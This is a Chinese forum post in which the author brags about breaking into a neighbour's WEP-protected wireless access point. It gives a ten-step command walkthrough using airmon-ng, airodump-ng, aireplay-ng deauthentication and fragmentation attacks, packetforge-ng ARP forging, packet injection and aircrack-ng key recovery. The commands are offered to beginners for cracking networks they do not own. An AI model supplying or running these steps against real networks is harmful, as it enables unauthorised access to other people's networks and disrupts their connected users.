刚刚用asus wl-167g破解了一个AP

拽少

这几天无意中看到我的周围居然有一个超强的AP，直接满格信号，心理那个痒啊，不破解它都对不起这么好的信号啊，哈哈…… 马上买了个asus wl-167g，今天上午就把他给破了，爽啊看图  的启发，稍微修改了一下就OK了，以下是我的步骤，不过在第7步卡了一会儿，刚开始死活不出来.xor文件，后来耐心的等了差不多半小时，不停地y，回车……最后有惊无险的才生成.xor文件 步骤： 1、ifconfig -a ；（查看无线网卡，如：rausb0） 2、ifconfig -a rausb0 up ；（激活网卡） 3、airmon-ng start rausb0 6 ；（激活网卡的monitor模式，其中6可选可不选） 4、airodump-ng --ivs -w xx -c 6 rausb0 ；（其中xx是生成的抓包的文件名，生成xx-01.ivs，这个下面的分析过程会用到的；而6是要**的信道号，不选就是所有的14个信道都**，建议先不选，**到信号强的ap后再次用该命令来专门**） 5、上面的窗口不关闭，让它一直在**状态，新开窗口，输入： aireplay-ng -0 3 -a ap的mac -c ap客户端的mac rausb0 ； （其中的3是号攻击的次数，-a后面的是ap的mac地址，-c后面的是ap的客户端的mac地址，这个是在第4步中**到的客户端） 6、aireplay-ng -1 0 -e ap的essid -a ap的mac rausb0 ；(-e后面的是ap的essid，-a后面的是ap的mac地址) 这时，系统将回显 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) 7、输入aireplay-ng -5 -b ap的mac -h 自己的无线网卡mac rausb0 ；（获得xor文件，-b后面的是ap的mac地址，-h后面的是自己的无线网卡mac地址）如果一切顺利，系统将回显 Use this packet ? 输入y 回车再输入ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件 8、packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w mrarp 其中，–l中的l是L的小写，别和1混淆，而其中的fragment -xxxx-xxxxxx.xor 是刚才第七步生成的文件名 系统回显：Wrote packet to: mrarp 9、输入aireplay-ng -2 –r mrarp -x 1024 rausb0 ；（发包攻击.其中，-x 1024 是限定发包速度）输入y 回车 攻击开始 这时，前面的抓包窗口上的data将迅速增加。 10、到数据增加到3万以上时，另开窗口，启动 aircrack-ng -n 64 -b ap的mac xx-01.ivs ；（xx-01.ivs是第4步时生成的抓包文件名）其中 64 是64位密码，如果是128位，换成128即可。 希望对新手有用！